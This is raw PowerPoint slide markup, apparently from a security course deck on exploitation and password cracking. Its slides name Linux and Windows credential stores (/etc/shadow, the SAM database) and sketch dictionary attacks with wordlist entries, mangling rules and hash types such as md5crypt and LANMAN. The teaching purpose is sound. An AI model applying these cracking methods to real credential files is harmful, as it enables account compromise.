            <a:off x="6403073" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Rule list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E6C803-263C-0946-8DD3-C89F5ACECEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8218619" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326A4514-1762-4847-9E6D-0C49F16716C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335621" y="4508260"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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3F1055-8580-A341-B76B-5B1981AF066F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8167510" y="4483188"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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7E5126C-EE55-3B42-854C-3429EBEF7EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294081" y="4960710"/>
            <a:ext cx="1642516" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>append #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82621CD-73A9-0647-ABA3-3F0C561AEFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8158996" y="4601976"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>md5 + salt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDC6B83-D39D-8F45-A190-76FBDF44B530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292494" y="5295302"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>prepend #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1377CF9-4407-3346-8296-EAE984BA4229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292493" y="5681578"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*04 +0 '4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE28DDD6-A240-EA48-BC28-02F2B28B6656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292495" y="4335575"/>
            <a:ext cx="1526598" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Z5 *75 '5 { O02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Cross 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFB0114-1999-1243-99E0-54E76A8088D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067075" y="5076571"/>
            <a:ext cx="198082" cy="209092"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 38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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5D00EB-4369-DC44-B52F-6F0CFAABA050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876953" y="5056858"/>
            <a:ext cx="198082" cy="209092"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 38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D1ACC25-5599-034C-825D-3F80CCA4BF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8152070" y="4956715"/>
            <a:ext cx="1531937" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>md5crypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B08725-6433-E549-8CCF-9085679A77F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285568" y="4639297"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>flip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32EABCF-E11A-7142-B03E-B6D7786F0818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8165922" y="5293813"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LANMAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3311883-B29D-7D4E-B530-B83D1E6AE2A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197487" y="5669865"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Salted-SHA1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4D332A-F2AE-F048-BCE1-9692A0890E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8166898" y="4322555"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sha256crypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AF7595-9C03-2845-9E6B-BB1035AAE63A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8131384" y="4951899"/>
            <a:ext cx="1552623" cy="390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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0F6665-076C-2B47-A73F-3CB39A55504E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795921522"/>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337510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9" y="634946"/>
            <a:ext cx="3372529" cy="946719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>Exploitation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030E7ED3-BC2B-BE4E-8F40-2B766D479F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="2385573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where are passwords stored?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAM Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7CA5B4-80CC-C44E-ACAA-6122588012A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8383605" y="1075939"/>
            <a:ext cx="2645083" cy="383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Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C5C27B-EE6F-E74A-B465-D11F2B5D7F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368054" y="1554302"/>
            <a:ext cx="693683" cy="316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261679-C3F6-064B-BB76-F2E5FBEE2EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="1939499"/>
            <a:ext cx="2739676" cy="399393"/>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Hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA4E351-A9E8-B04D-A4E0-223D6F27CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="2585429"/>
            <a:ext cx="2758141" cy="728753"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A496BA-5F6C-E643-84B7-D982C01B4B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212577" y="2268222"/>
            <a:ext cx="693683" cy="49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E611C-7DD1-F14F-8515-679613C6594F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4472427"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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78FCCCE-6A42-B744-88DD-EBE2CFF84ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4942655"/>
            <a:ext cx="1531937" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>password1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AF286A-10F5-ED40-9688-9505E5469EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4619360"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7EEC22-7C42-6043-9BBB-2701600D196E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4239187"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
